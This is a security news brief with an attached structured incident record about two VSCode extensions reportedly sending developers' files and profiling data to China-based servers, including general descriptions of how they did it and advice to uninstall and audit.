Malicious VSCode Extensions Exfiltrate Developer Data to China-Based Servers
Two AI-powered extensions in Microsoft’s Visual Studio Code (VSCode) Marketplace, collectively installed 1.5 million times, have been found exfiltrating developer data to servers based in China. Disguised as legitimate coding assistants, the extensions ChatGPT – 中文版 (1.34 million installs) and ChatMoss (CodeMoss) (150,000 installs) operate without disclosing their data-collection activities or obtaining user consent.
Researchers at Koi Security identified the extensions as part of a campaign dubbed MaliciousCorgi, noting they share identical spyware infrastructure and backend servers. Both remain available on the VSCode Marketplace as of publication.
The extensions employ three data-harvesting mechanisms:
- Real-time file monitoring – Any opened file is immediately encoded in Base64 and transmitted to attackers via a hidden iframe, capturing both initial content and subsequent edits.
- Server-controlled file theft – A stealth command exfiltrates up to 50 files from the victim’s workspace per request.
- User profiling – A zero-pixel iframe loads four commercial analytics SDKs (Zhuge.io, GrowingIO, TalkingData, and Baidu Analytics) to track behavior, fingerprint devices, and build identity profiles.
The undocumented functionality poses severe risks, including exposure of source code, configuration files, cloud credentials, and sensitive .env files containing API keys. While Microsoft has been notified, no response has been received, and the extensions’ publisher remains unreachable.
Microsoft TPRM report: https://www.rankiteo.com/company/Microsoft
"id": "Mic1769200079",
"linkid": "Microsoft",
"type": "Cyber Attack",
"date": "1/2026",
"severity": "85",
"impact": "4",
"explanation": "Attack with significant impact with customers data leaks"{'affected_entities': [{'customers_affected': '1.5 million users',
'industry': 'Software Development',
'location': 'Global',
'name': 'Microsoft VSCode Marketplace Users',
'size': '1.5 million installations',
'type': 'Developers'}],
'attack_vector': 'Malicious Extensions',
'customer_advisories': 'Users of *ChatGPT – 中文版* and *ChatMoss (CodeMoss)* '
'extensions are advised to uninstall them immediately '
'and review their systems for signs of data '
'exfiltration.',
'data_breach': {'data_exfiltration': 'Yes (Base64-encoded files transmitted '
'to China-based servers)',
'file_types_exposed': ['Source code files',
'Configuration files',
'.env files'],
'personally_identifiable_information': 'Yes (user behavior '
'data, device '
'fingerprints)',
'sensitivity_of_data': 'High (includes PII, credentials, and '
'intellectual property)',
'type_of_data_compromised': ['Source code',
'Configuration files',
'Cloud credentials',
'API keys',
'.env files',
'User behavior data',
'Device fingerprints']},
'description': 'Two AI-powered extensions in Microsoft’s Visual Studio Code '
'(VSCode) Marketplace, collectively installed 1.5 million '
'times, have been found exfiltrating developer data to servers '
'based in China. Disguised as legitimate coding assistants, '
'the extensions *ChatGPT – 中文版* (1.34 million installs) and '
'*ChatMoss (CodeMoss)* (150,000 installs) operate without '
'disclosing their data-collection activities or obtaining user '
'consent. Researchers at Koi Security identified the '
'extensions as part of a campaign dubbed *MaliciousCorgi*, '
'noting they share identical spyware infrastructure and '
'backend servers. Both remain available on the VSCode '
'Marketplace as of publication.',
'impact': {'brand_reputation_impact': 'Potential reputational damage to '
'affected developers and organizations',
'data_compromised': 'Source code, configuration files, cloud '
'credentials, API keys, .env files',
'identity_theft_risk': 'High (user profiling and device '
'fingerprinting)',
'legal_liabilities': 'Potential regulatory violations (e.g., GDPR, '
'CCPA)',
'operational_impact': 'Potential exposure of sensitive development '
'data',
'systems_affected': 'VSCode installations with malicious '
'extensions'},
'initial_access_broker': {'entry_point': 'Malicious VSCode extensions'},
'investigation_status': 'Ongoing',
'motivation': 'Data harvesting, user profiling, and potential intellectual '
'property theft',
'post_incident_analysis': {'corrective_actions': 'Microsoft should enhance '
'extension vetting '
'processes, enforce '
'disclosure requirements, '
'and implement automated '
'monitoring for suspicious '
'behavior in extensions.',
'root_causes': 'Lack of transparency in extension '
'functionality, inadequate vetting '
'of VSCode Marketplace extensions, '
'and absence of user consent for '
'data collection.'},
'recommendations': 'Developers should audit installed VSCode extensions, '
'remove suspicious ones, and monitor for unauthorized data '
'exfiltration. Organizations should enforce stricter '
'extension policies and conduct regular security reviews.',
'references': [{'source': 'Koi Security'}],
'regulatory_compliance': {'regulations_violated': ['GDPR', 'CCPA']},
'response': {'third_party_assistance': 'Koi Security'},
'threat_actor': 'China-based actors',
'title': 'Malicious VSCode Extensions Exfiltrate Developer Data to '
'China-Based Servers',
'type': 'Data Exfiltration',
'vulnerability_exploited': 'Lack of disclosure and user consent for data '
'collection'}